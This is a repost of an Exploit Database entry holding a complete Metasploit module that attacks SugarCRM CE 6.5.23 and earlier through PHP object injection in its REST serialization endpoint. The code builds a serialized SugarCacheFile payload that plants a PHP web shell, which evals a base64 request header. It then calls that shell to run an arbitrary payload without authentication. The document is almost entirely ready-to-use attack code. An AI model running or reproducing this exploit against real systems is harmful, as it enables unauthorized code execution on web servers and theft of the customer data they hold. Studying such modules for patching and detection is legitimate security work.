SugarCRM 6.5.23 – REST PHP Object Injection (Metasploit)

• Exploit Database
• 35 阅读

• 作者： Egidio Romano
  日期： 2016-09-07
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40344/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'SugarCRM REST Unserialize PHP Code Execution',
  'Description'=> %q{
  This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23
  which could be abused to allow unauthenticated users to execute arbitrary PHP code with
  the permissions of the webserver. The dangerous unserialize() call exists in the
  '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct()
  method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory.
  },
  'Author' => 'EgiX',
  'License'=> MSF_LICENSE,
  'References' =>
  [
  ['URL', 'http://karmainsecurity.com/KIS-2016-07'],
  ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'],
  ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'],
  ['URL', 'https://bugs.php.net/bug.php?id=72663']
  ],
  'Privileged' => false,
  'Platform' => ['php'],
  'Arch' => ARCH_PHP,
  'Targets'=> [ ['SugarCRM CE <= 6.5.23', {}] ],
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Jun 23 2016'
  ))
  
  register_options(
  [
  OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"])
  ], self.class)
  end
  
  def exploit
  upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php'
  
  payload_serialized ="O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";"
  payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00"
  payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55"
  payload_serialized << ":\"<?php eval(base64_decode($_SERVER['HTTP_PAYLOAD'])); ?>\";}}"
  
  print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
  
  res = send_request_cgi(
  {
  'uri'=> normalize_uri(target_uri.path, 'service/v4/rest.php'),
  'method' => 'POST',
  'vars_post' => {
  'method' => 'login',
  'input_type' => 'Serialize',
  'rest_data'=> payload_serialized
  }
  })
  
  if not res or res.code != 200
  print_error("#{peer} - Exploit failed: #{res.code}")
  return
  end
  
  register_files_for_cleanup(File.basename(upload_php))
  
  print_status("#{peer} - Executing the payload #{upload_php}")
  
  res = send_request_cgi(
  {
  'method'=> 'GET',
  'uri' => normalize_uri(target_uri.path, upload_php),
  'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) }
  })
  
  if res and res.code != 200
  print_error("#{peer} - Payload execution failed: #{res.code}")
  return
  end
  end
  end